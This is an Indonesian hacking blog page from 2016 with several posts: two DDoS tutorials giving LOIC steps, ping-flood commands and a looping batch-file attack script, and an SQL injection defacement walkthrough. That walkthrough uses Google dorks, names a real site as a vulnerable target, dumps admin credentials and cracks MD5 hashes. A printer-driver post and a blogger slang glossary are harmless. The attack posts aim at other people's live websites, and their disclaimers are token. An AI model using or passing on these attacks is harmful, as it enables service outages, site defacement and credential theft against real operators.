Tuesday, February 23, 2016

Menyerang Server Menggunakan DDos Attack

Menyerang Server Dengan DDos Attack - Apakah Anda Berniat Menyerang Server Dengan DDos Attack, Apa itu DDos Attack serangan DDoS Attack adalah serangan yang dilakukan pada server dengan cara membanjiri server dengan request ping atau request lainya dalam jumlah yang sangat banyak. karena serangan ini tidak dapat dicegah dan karena memang keroyokan dan secara berkelompok, ya berdo’a saja supaya situs kita tidak down akibat kena serangan DDoS Attack. ada pun cara untuk melakukan DDoS Attack sangat-sangat mudah sebenarnya cara ini sangat mudahy sekali diterapkannya, bahkan anak SMP,SD pun bisa melakukanya. untuk mereka yang menggunakan OS Windows (All Windows) dan dapat menggunakan dua cara. cara yang pertama adalah dengan menggunakan software bernama Low Orbit Ion Cannon. program ini tidak perlu diinstall cukup jalankan seperti program portable lainya.


Klik gambar untuk memperjelas,.
1. Jalankan programnya, Setelah muncul Jendela di bagian URL masukan situs yang ingin diserang misalkan www.itulahilmu.blogspot.com,
2.Lalu klik lock on dan lihat pada gambar diatas nomer 2nya
3.Kemudian setelah itu klik tombol IMMA CHARGIN MAH LAZER
4Port=isikan portnya dan biasanya jika suatu kelompok menyerang denagn ddos ini akan diberikan link target dan portnya ini..
5.Atur kecepatan penyerangannya contoh pada gambar diatas adalah yang tercepat.
6.Lalu silakan lihat hasilnya dibawah, disana terdapat keterangan berapa jumlah packet yang connecting, requesting, downloading, downloaded, requested  dan failed.
7.Dan jika berhasil berarti pada bagian yang failed seharusnya banyak , yang menandakan bahwa server telah down.
softwarenya bisa anda download disini low Orbit Ion Cannon

Low Orbit Ion Cannon – Tool DDOS pendukung Wikileaks
Low Orbit Ion Cannon
Jika tool ini tidak berjalan pada windows anda silahkan, Download .net framework versi 4 dari microsoft
Beberapa waktu yang yang lalu, Wikileaks dicekal oleh amrik dan beberapa website seperti mastercard dan paypal menutup akses dana ke founder Wikileaks, akibatnya sebuah kelompok hacker 4chan melakukan serangan DDOS ke website yang menolak Wikilieaks, alhasil mastercard sempat down. nah. mereka menggunakan tool DDOS yang dinamakan LOIC (Low Orbit Ion Cannon). Saya share untuk pembelajaran


Cara kedua adalah dengan membanjiri Ping melalui command promt alias CMD. buka start->run dan ketikan cmd, atau tekan kombinasi tombol Windows + R dan ketik cmd, kemudian enter. setelah jendela Command Prompt muncul ketikan
#ping target.com
setelah itu akan muncul nomor ip dari situs tersebut, anggaplah nomor ip adalah 192.168.1.1, kemudian saatnya melakukan serangan ke sistem server hosting target.com.
#ping 192.168.1.1 -l 39999 -n 10000000 -w 0.00001
yang berarti :
n = besarnya Ping , nilai “10000000″ silakan diubah sesuai dengan yang diinginkan .
192.168.1.1= ganti alamat ip dari situs target.com
-W 0,00001 = Ini adalah periode waktu tunggu antar satu ping.
dua cara tadi jika anda di windows, bagaimana jika di linux, hal ini jauh lebih mudah untuk dilakukan tapi hal pertama yang harus dimiliki adalah hak sebagai root. silakan ketika command ini di terminal linux.
#sudo ping -f 192.168.1.1
 system akan melakukan ping sebanyak yang bisa dibuat, biasanya 10.000/menit, jika respondnya adalah Host Unreachable dll, berarti system telah down. untuk alamat 192.168.1.1 silakan ganti dengan alamat ip situs target.com.
Selamat mencoba dan Try With Yout Own Risk. BTW jangan gunakan pada situs blogspot ya karena blogspot punya mbah google, jadi mbah google itu sangat kuat lho, karena situs ini dilindungi oleh UUD tentang persitusan, dilindungi dan diberkahi pula oleh Allah SWT, 

Sumber : http://itulahilmu.blogspot.co.id/
READ MORE

Wednesday, February 17, 2016

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7 - Ada tutorial hacking website lagi nihlumayan SQL Injection. Kalo sebelumnya saya pernah share tentang Cara Deface Website Forum Sederhana Untuk Newbie yang tutorialnya pake skema "order+by+bla.. bla.. bla" nah sekarang saya akan share tentang cara deface lagi nih sob, tapi yang ini lebih mudah karena kita pake tools, jadi tinggal klak-klik aja juga kelar.

http://cirebon-cyber4rt.blogspot.com/2012/03/cara-deface-website-dengan-menggunakan_18.html
Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Tapi ada efek sampingnya juga pake cara ini, Bikin Orang Jadi Males hahaha :D Tapi kalo udah tau dasarnya yang pake "order+by+ bla... bla..." it's ok lah, yang penting kita tau jalannya klo disuruh manual, kalo belum tau cara manualnya baca ini dulu Cara Hacking Website Dengan Teknik SQL Injection :D 


Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7
Yang pertama dan wajib ada yaitu Toolsnya:

Download Link :
Langkah kedua adalah mencari website yang vulnerabillity ( terdapat celah keamanan ), Lah carinya dimana? gampang sob, cari aja di Google :D ada banyak disana. Akh males nyarinya, yaudah nih aku kasih dorknya aja biar lebih mudah. Caranya? caranya masukan dork dibawah ini ke mesin pencarian Google, nanti muncul seribu satu macam website yang sama, nah tinggal kamu pilih satu-satu, cari yang vuln ( terdapat celah keamanan ), OK.

Google Dork SQL Injection :
  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:games.php?id=
Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk sobat.

Langkah ketiga, Sebelum memulai attacking kita harus menemukan website yang bisa dihack ( vulnerabillity ). Dari ribuan website dari dork yang saya berikan diatas, belum tentu salah satunya yang bisa dihack. Untuk mengetahuinya kita harus memberi tanda petik di akhir alamat website.
Contohhttp://www.wheelieboymotorsports.com/product_detail.php?pid=316 menjadi http://www.wheelieboymotorsports.com/product_detail.php?pid=316'. Jika terdapat tulisan :

Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

Berarti Web tersebut Vuln.
Copy Url yang sobat dapatkan tadi ke kolom target.
Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316. ( tidak pakai tanda petik )


Kemudian klik Inject. Maka secara otomatis tools akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll. Jika Inject berhasil akan muncul tampilan seperti ini.


Kalau sudah klik Get Database.
*Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawah, saya memilih database natural. Selanjutnya klik Get Tables.


Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin.


Langkah Keempat, Kolom SQL
Jika sudah pilih User kalian klik get Coloumns.
Di Coloumns block yang usr_login dan usr_pass atau user_name dan password_admin lalu klik Dump Now.


Setelah itu akan muncul tampilan seperti ini


Pilih salah satu dari user login dan user password tersebut.
Ada yang aneh? Password yang ditampilkan bentuknya kok seperti ini ya?
  • 987d29241cc4f2a7465f2d9356ab3615
  • 987d29241cc4f2a7465f2d9356ab3615
Langkah Kelima, MD5 Password
Password tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?

Caranya cukup mudah, buka saja situs MD5 Crack, lalu masukkan kode tersebut dikotak penelusuran. Berdo'a saja password yang sobat dapatkan tersebut cukup lemah, sehingga bisa dipecahkan dengan metode Bruto Force. Setelah sobat masukkan, lalu klik Crack hash baby.

Selesai. sekarang cari halaman login atau adminnya.
Ada beberapa contoh halaman login yang bisa sobat pakai
http://target.com/admin.htmlhttp://target.com/admin.php
NOTE - Bagi yang PC nya kedetect virus atau takut PC nya kena virus, bisa pake sandboxie biar lebih aman Click Here
READ MORE

Install driver Epson Stylus TX121 di Ubuntu 14.04

Printing dan scanning adalah suatu hal yang cukup sulit di linux, karena kebanyakan driver printer tersedia dalam bentuk file .exe yang otomatis hanya bisa di run di windows. Setelah googling sekian lama, saya menemukan website Avasys , dan mereke menyediakan linux driver untuk printer epson! yessss. ini dia bagian download nya : download driver
selain di website avasys tadi, anda juga bisa download di link dropbox yang saya berikan.
setelah semua paket terdownload, install menggunakan gdebi 

install paket printer

install paket scanner

setelah semua terinstall, search scanner dan printer di dash 



Sekian, semoga bermanfaat !

Sumber : johangifari
READ MORE

cara melakukan serangan DDOS dengan command prompt

HAI SEMUA - Kali ini Mimin mau share cara melakukan serangan DDOS dengan command prompt di simak dengan baik ya :) 

DoS attack: Denial of Service attack
Serangan ini melibatkan satu komputer / koneksi internet untuk (membanjiri) sebuah server dengan paket ICMP/TCP/UDP,tujuan dari serangan ini adalah untuk membuat bandwith server menjadi overload, sehingga server tidak bisa lagi menangani trafik yang masuk dan server akhirnya down.

DDoS attack: Distributed Denial of Service attack
DDoS attack hampir sama dengan Dos tetapi perbedaan dari hasil yang disebabkan olehnya sangat berbeda. Serangan DDoS dijalankan menggunakan metode computer yang terdistribusi yang sering disebut dengan 'botnet army', atau biasa juga dikenali dengan komputer "zombie". Proses nya dengan cara menginfeksi komputer lain dengan malware yang memberikan akses bagi botnet owner kepada komputer yang terinfeksi. Hal ini bisa berarti, bootnet owner bisa menggunakan resource apa saja dari komputer korban dan menggunakan koneksi komputer tersebut untuk membanjiri (flood) target yang akan diserang. Server yang diserang akan lumpuh sangat cepat karena beberapa koneksi digunakan untuk melawan satu koneksi. Bayangkan ini seperti perkelahian. jika 1 lawan 1 maka kemungkinan menangnya 50:50, tapi jika 1000 lawan 1 ? matilah kita.

Sebetulnya banyak software untuk men-generate serangan DOS, tapi kali ini saya akan mencoba men-generate serangan DOS melalui cmd windows.

cara yang pertama :
ketikan command berikut pada cmd :
1. Buka CMD 
2. ketik "ping <ip add>  -l 50000 -n 5000 -w 0.00001"
  •  <ip add> = IP Address situs yang akan di DDoS (bisa diganti dengan alamat situsnya)
  • -l 50000 = besar ping yang dikirim server sebesar 50000 bytes (bisa diganti maksimal 65500 bytes)
  • -n 5000 = ukuran buffer yang dikirim 5000 bytes (bisa diganti sesuka hati)
  • -w 0.00001 = waktu tunggu tiap ping 0.00001 milidetik (bisa diganti sesuka hati)
3. Tekan enter dan tunggu hingga anda mendapatkan pesan "Request timed out"
cara yang kedua :  
1. Buka Notepad (accesoris -> notepad)

2. tulis script dibawah ini 
@echo off

mode 67,16
title DDOS Attack By http://unlimited-blogging.blogspot.co.id/
color 0b
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS With Batchfile By http://unlimited-blogging.blogspot.co.id/
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0d
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

 3. Kemudian Save Menggunakan Extensi .Bat (contohDDoS.bat)

4. setelah itu buka file yang telah kita buat tadi 

5. Server-target isikan dengan nama domain / nama situs yang akan kita DDOS. misal : www.google.com

6. Setelah kita isikan server-target maka akan muncul alamat ip target, lalu pada ip host isikan ip address target kita

7. Lalu akan ada packet size, isikan terserah anda.
misalkan 1000000000 

8. Setelah itu tekan enter maka proses DDOS akan berjalan, DDOS membutuhkan waktu yang lumayan lama tergantung kemampuan situs yang kita DDOS. Akan lebih baik kalau kita melakukan DDOS secara serentak atau dengan banyak orang.

mudah kan? hehe
tapi ingat, ini hanya untuk sekedar pengetahuan saja. jangan dicoba ke website orang lain ya, apalagi website resmi. karena serangan semacam ini cukup untuk membuat kita hidup dibalik jeruji besi ! haha
jika anda ingin mencoba serangan DDOS ini, maka cobalah pada sistem yang anda buat sendiri, agar tidak menimbulkan kerugian untuk orang lain
semoga bermanfaat ..
READ MORE

Sebutan Yang Biasa Anak Blogger Ucapkan

HAI Semua - Kali Ini Mimin Mau Share Sebutan Yang biasa anak blogger ucapkan , biar anda lebih mengerti yuk di simak dengan baik apa aja arti dari sebutan anak blogging :)

Kumpulan Bahasa Gaul Blogger

Adblock: Adds-on/pengaya untuk memblokir iklan di blog/web
Ads: Iklan

Adsense: situs PPC milik Google
Advertiser: orang yang memasang iklan, seorang pengiklan
Afiliasi: program kerjasama untuk memasarkan produk dagangan orang lain secara online
Afiliate: seorang pebisnis afiliasi
Agan: Kependekan dari Juragan, panggilan sesama blogger
Aganwati: Panggilan untuk blogger perempuan
AKA: As Known As. Alias
Alay: Anak Layangan. Istilah untuk norak
Ane: Saya
Avatar: Gambar profil yang merepresentasikan diri kamu di blogger/wordpress

Backup: Proses untuk mengamankan file penting dari blog ke komputer
Banned: Akun yang di nonaktifkan karena telah melakukan pelanggaran tertentu
Blog: sebuah aplikasi weblog yang berisi posting/artikel
Blogdetik: platform blog gratis dari detik.com
Blogger: seorang pemilik/admin blog
Blogger: platform blog gratis dari perusahaan Google
Blogger Detik: seorang blogger pengguna blogdetik
Blogwalking: Sebuah aktivitas berkunjung dan berkomentar di blog orang lain
Bot: Suatu program komputer untuk menjalankan perintah otomatis
Bro: Brother
BTW: By The Way, ngomong-ngomong (mengalihkan pembicaraan baru)
Buffer / Buffering: Waktu untuk menunggu loading video
Bukmak: Bookmark, aktivitas menyimpan halaman website/blog di browser
BW: Blogwalking

Captcha: Fitur untuk menguji bahwa aktivitas tersebut benar dilakukan oleh manusia, bukan
bot.
Capcay: Captcha
CMIIW: Correct Me If I Wrong, Betulkan pendapat saya jika salah
Copas: Copy Paste, aktivitas menyalin artikel di blog orang lain dan menerbitkan artikel
tersebut di blog pribadi
Ctrl+D: Bookmark

Dodol: Lambat, jelek
Domain: alamat sebuah blog/web. Contoh: http://cara-ririn.com
Donlot/Donlod: Istilah lain Download/Unduh

Earning: penghasilan seorang blogger
Emoticon: Ikon untuk mewakili suatu ekpresi tertentu
Ente: Kamu


kamus istilah blogger


GA: Google AdSense
GA: Give Away
Gan: Kependekan Juragan, panggilan sesama blogger
Give Away: Sebuah kontes/lomba skala kecil di lingkungan blogger

Hoax: Informasi bohong
Hosting: Tempat penyimpanan file secara online di internet

Img: Image, Gambar
Inpo / Inpoh: Info, informasi

Juragan: Panggilan khas sesama blogger

Kategori: Atau Label, sebuah fitur untuk mengelompokkan posting kedalam topik tertentu
Kepo: Rasa ingin tahu yang berlebihan
Klonengan: Clone, produk tiruan
Komen: Komentar
Konten: Isi dari suatu postingan
Kontes SEO: lomba bikin artikel agar muncul di halaman pertama search engine
Kopdar: Kopi Darat. Acara bertemu antar sesama blogger secara offline
KW: Produk tiruan aslinya. Semakin besar angkanya, semakin buruk kualitasnya

Lebay: Berlebihan
LOL: Laugh Out Loud. Tertawa terbahak-bahak

Maho: Manusia homo
Mangtab / Mangstab: Mantap
Menu Navigasi: Sebuah fitur blog yang biasanya terdapat di bagian atas blog, berbentuk
tulisan/link horizontal
MIgrasi: Proses perpindahan dari platform blog satu ke platform yang lain
Mimin: Admin blog

Nais: Nice
Newbie: gelar untuk blogger pemula
Nubi: Newbie
Nubitol: Newbie
Nyubi: Newbie

Offline: Tidak terhubung dalam jaringan internet
OL: Online
Online: Sedang terhubung dalam jaringan internet
Onpage SEO: Optimasi Mesin Pencari di internal blog/web sendiri
Offpage SEO: Optimasi Mesin Pencari di eksternal blog/website
OOT: Out Of Topic, diluar topik bahasan

Page: Halaman statis di blog, berbeda dengan halaman postingan
Pageview: Jumlah halaman blog yang dibuka oleh pengunjung blog
Pejwan: Page One. Halaman pertama situs mesin pencari
Permalink: url/alamat sebuah posting/blog
Pertamax: Pertama kali. Blogger yang pertama kali berkomentar di suatu posting/artikel
Plugin: Script untuk menunjang performa web
PM: Private Message
Posting: artikel
Postingan: artikel
PPC: Pay Per Click, bisnis online dibayar setiap klik iklan
PTC: Paid To Click, bisnis online dibayar untuk mengklik iklan di situs PTC

Quote: Mengutip tulisan atau komentar dalam suatu postingan

Bahasa Gaul dan Kamus Blogger

Sedot: Download, unduh sebuah file
Seken: Second, produk/barang bekas
Selfhosting/Selfhosted: blog/website yang di simpan di tempat/hosting sendiri
SE: Search Engine, mesin pencari (Google, Bing, Yahoo Search, dll)
SEO: Search Engine Optimization, Optimasi Mesin Pencari
SERP: Search Engine Result Page, Halaman Hasil Mesin Pencari
Setubuh: Setuju
Share: berbagi
Sista: Sister, Panggilan khas blogger perempuan
Smilie: Ikon/gambar untuk mewakili suatu ekspresi
Sob: Sobat
Sotosop: Photoshop
Sotoy: Sok tahu
Spam: sampah
Spam Blog: Blog sampah
Spam Comment: Komentar sampah
Spoiler: Fitur untuk menyembunyikan suatu konten dalam postingan
Sticky: Menempelkan postingan/artikel tersebut di halaman awal blog
Submit: mengirim/memasukkan sesuatu
Subdomain: alamat sub dari domain utama. Contoh: http://blog.cara-ririn.com

Tags: Hampir sama dengan fitur kategori, tag berguna untuk mengelompokkan artikel dengan
topik spesifik
Template: desain halaman web platform blogger/blogspot
Theme: desain halaman web platform wordpress
TKP: Laman atau situs yang ada di link
Traffic/Trafik: Jumlah lalu lintas blog yang meliputi jumlah visitor, jumlah pageview, dll
Tutorial: artikel yang membahas langkah-langkah membuat sesuatu

Unduh: Download
Update: Pembaharuan, dilengkapi
Url shortener: situs pemendek/penyingkat sebuah url web/blog
User: Pengguna
Username: nama pengguna

Visitor: Pengunjung/pembaca sebuah blog
Visitor Online: Pengunjung yang sedang online berkunjung ke blog saat ini

Website: Sebuah situs online yang berisi halaman/posting
Widget: Sebuah fitur di dalam blog yang biasanya berada disamping halaman blog
WordPress: platform blog gratis milik perusahaan automattic.com
Wp: WordPress

Zombie: Blog mati yang dihidupkan kembali
READ MORE